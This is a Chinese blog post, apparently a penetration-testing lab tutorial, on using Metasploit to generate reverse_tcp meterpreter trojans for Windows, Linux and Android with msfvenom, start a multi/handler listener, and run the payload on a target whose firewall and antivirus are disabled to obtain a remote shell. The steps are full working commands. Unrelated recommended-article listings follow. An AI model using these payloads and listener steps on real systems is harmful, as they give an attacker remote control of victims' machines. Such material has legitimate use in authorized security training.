MSF 原始渗入思路

已于 2022-09-01 19:34:37 修改
阅读量529 收藏
点赞数
分类专栏: 网络安全 文章标签: linux
于 2022-08-27 21:50:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_like_ctrl/article/details/126563033
版权

基本思路:

  1. 攻击机生成木马
  2. 移动木马到靶机
  3. 攻击机开启监听
  4. 靶机运行木马(关闭安全软件)
  5. 攻击机进行操作

Windows:

  1. 利用msfvenom制作(在攻击机上操作)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe > shell.exe

  1. 将木马放入同一个网段的Windows攻击机(关闭防火墙,关闭Windows defender)

  2. 利用msf开启监听(在攻击机上操作)

msfconsole 
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload windows/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听

4.运行靶机上的shell.exe
5.攻击机上会出现

meterpreter>

  1. 成功

Linux:

  1. 利用msfvenom制作(在攻击机上操作)
msfvenom  -p linux/x64/meterpreter/reverse_tcp LHOST=1攻击机ip LPORT=4444  -f elf  >shell

  1. 将木马放入同一个网段的Linux攻击机(关闭防火墙)

  2. 利用msf开启监听(在攻击机上操作)

msfconsole 
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload linux/x64/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听

4.运行靶机上的shell

./shell

5.如果无法运行就赋予权限

chmod 777 shell 
#在放shell的文件夹里运行,再运行
./shell

6.攻击机上会出现

meterpreter>

  1. 成功

Android:

  1. 利用msfvenom制作(在攻击机上操作)
msfvenom -p android/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 R > shell.apk

  1. 将木马放入同一个网段的安卓模拟机

  2. 利用msf开启监听(在攻击机上操作)

msfconsole 
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload android/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听

4.点击MainActive运行靶机上的木马
5.如果无法运行就去设置赋予权限
6.攻击机上会出现

meterpreter>

  1. 成功

没发现这过程就是复制粘贴,改了几句话吗?

真不想起名TAT
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
windows靶机_msfvenom生成木马之控制靶机
weixin_39986543的博客
01-26 854
1、简介本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。2、实验环境1、一台kali虚拟机 ip为192.168.110.1402、一台win10虚拟机3、实验步骤1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。msfvenom -p windows/mete...
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7417
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
Linux相关指令
m0_46502962的博客
07-25 146
其中的-lpthread不是必须的,只有用到该库才输入加上。//该指令将demo.c生成的a.out文件命名为demo8。//将运行结果放到test.ret.txt文件中,没有就创建。1.查看手册 man 3 free。将该运行程序放到后台运行。③(gbd)r 运行。④(gbd)q 退出。
LinuxLinux发展史
weixin_51142926的博客
07-22 4271
大家好!此篇文章并非技术博文,而是简单了解Linux的时代背景和发展史,只有知其所以然才能让我们更好地让走进Liunx的世界!
Linux Vim教程:多文件编辑与窗口管理
07-25 881
Vim作为一款功能强大的文本编辑器,支持多文件编辑和窗口管理。掌握这些高级技巧可以大大提高工作效率和文件处理能力。本文将详细介绍Vim中多文件编辑与窗口管理的各种方法和技巧,包括缓冲区、标签页、分屏、快速切换等。通过这些实用技巧,您可以更高效地在Vim中进行复杂的文本编辑任务。
RV1126 Linux 系统,接外设,时好时坏(一)应该从哪些方面排查问题
小灰灰的博客
07-25 89
Linux 系统中排查外设连接问题时,需要从硬件、软件、时序和协议等多个方面进行全面分析。逐步排查并记录每一步的测试结果,有助于快速定位问题的根源。解决 “时好时坏”的问题可能需要综合考虑多个因素,耐心细致的排查将会提高找到解决方案的效率。
Linux下pip的安装、命令总结、换源
2301_79695159的博客
07-24 531
Linux下pip的安装、命令总结、换源
LinuxLinux makefile 教程
沐风—云端行者
07-23 701
什么是makefile?或许很多Winodws的程序员都不知道这个东西,因为那些Windows的IDE都为你做了这个工作,但我觉得要作一个好的和professional的程序员,makefile还是要懂。这就好像现在有这么多的HTML的编辑器,但如果你想成为一个专业人士,你还是要了解HTML的标识的含义。特别在Unix下的软件编译,你就不能不自己写makefile了,会不会写makefile,从一个侧面说明了一个人是否具备完成大型工程的能力。因为,makefile关系到了整个工程的编译规则。一个工程中的源文
Linux C | 网络编程】进程间传递文件描述符socketpair、sendmsg、recvmsg详解
qq_42037383的博客
07-25 965
我们的目的是,实现进程间传递文件描述符,是指 A进程打开文件fileA,获得文件描述符为fdA,现在 A进程要通过某种方法,传递fdA,使得另一个进程B,获得一个新的文件描述符fdB,这个fdB在进程B中的作用,跟fdA在进程A中的作用一样。即在 fdB上的操作,即是对fileA的操作。可能很多人想到的是用管道pipe来实现,但是却没想象的那么容易。
linux如何卸载python3.5
hakesashou的博客
07-25 473
2、卸载python3.5及其依赖。1、卸载python3.5。3、清除python3.5。
linux设置~/.vimrc步骤
qq_43982499的博客
07-24 504
set backupdir=~/.vim/backup " 设置备份文件存放路径。set tabstop=4 " 设置Tab键宽度为4个空格。set shiftwidth=4 " 设置自动缩进宽度为4个空格。set undodir=~/.vim/undo " 设置撤销历史文件存放路径。set hlsearch " 搜索结果高亮显示。set fileformat=unix " 设置文件格式为Unix风格。
07.24_111期_Linux_端口号
最新发布
weixin_46366676的博客
07-25 458
URL:统一资源定位符,实际上就是一个形如https://new.q.com /rain/a/........的网址,然后访问这个 网站的服务器时 是通过 域名生成的 IP地址 和 80 端口号 这两者进行访问的。1. URI是 URL 的 后半部分,即访问资源的路径,也有可能是完整的URL。只要知道一个服务的其中一个端口号,就可以访问这个确定的服务。/rain/a/........ 是资源,可能是网页,图片,视频,音频等资源。这个反斜杠 / 代表的是web根目录,可以是目标服务器中的任意目录。
linux+springboot+nginx转rtsp流为hls流
k0933的博客
07-25 288
1、基本逻辑为前端请求时获取新的rtsp流地址,调用一次rtsp2Hls转码方法,将生成新的hls切片文件(不用考虑旧文件,将会覆盖),转码时先停止当前转码线程,再创建新的线程。2、线程监控:开启一个定时任务,每10分钟查看一次,若有异常线程,则重新获取rtsp流地址进行转码,在晚上8点后则停止所有转码任务。1、下载(自定义版本:http://www.ffmpeg.org/releases/)#编译安装(默认安装在/usr/local/nginx)进入:/usr/local/nginx/sbin。
Linux Centos firewalld 使用
yangguangzhidi的博客
07-25 487
1、添加:firewall-cmd --zone=public --add-port=1222/tcp --permanent。4、删除:firewall-cmd --zone= public --remove-port=1222/tcp --permanent。3、查看:firewall-cmd --zone= public --query-port=1222/tcp。4、查看所有打开的端口: firewall-cmd --zone=public --list-ports。
内网MSF基础:PostgreSQL配置与权限管理教程
本篇文章主要介绍了在内网环境中使用Metasploit Framework (MSF)进行基础操作和配置的过程。MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值